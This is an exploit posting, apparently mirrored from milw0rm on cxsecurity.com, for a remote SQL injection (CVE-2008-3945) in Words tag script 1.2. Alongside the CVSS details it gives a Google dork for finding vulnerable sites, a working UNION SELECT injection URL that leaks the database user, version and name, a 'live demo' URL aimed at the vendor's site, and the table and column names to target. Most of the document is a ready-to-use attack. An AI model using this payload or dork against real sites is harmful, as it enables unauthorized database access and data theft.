Bug: Words tag script 1.2 (word) Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Words tag script 1.2 (word) Remote SQL Injection Vulnerability

Published
Credit
Risk
2008.09.08
Hussin X
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-3945
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

|___________________________________________________|
|
| Words tag script v1.2 (word) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5
|
| DorK : "Powered by words tag script"
|___________________________________________________|

Exploit:
________



www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config
_variables--






L!VE DEMO:
_________


http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database()
)+config_variables--


________________________

table_name : column_name

config_variables:variable_name
config_variables:value
config_variables:id
config_variables:title
config_variables:text
config_variables:description
_______________________


____________________________( Greetz )_________________________________
|
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________


Im IRAQi

References:

http://www.milw0rm.com/exploits/6336
http://secunia.com/advisories/31653

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version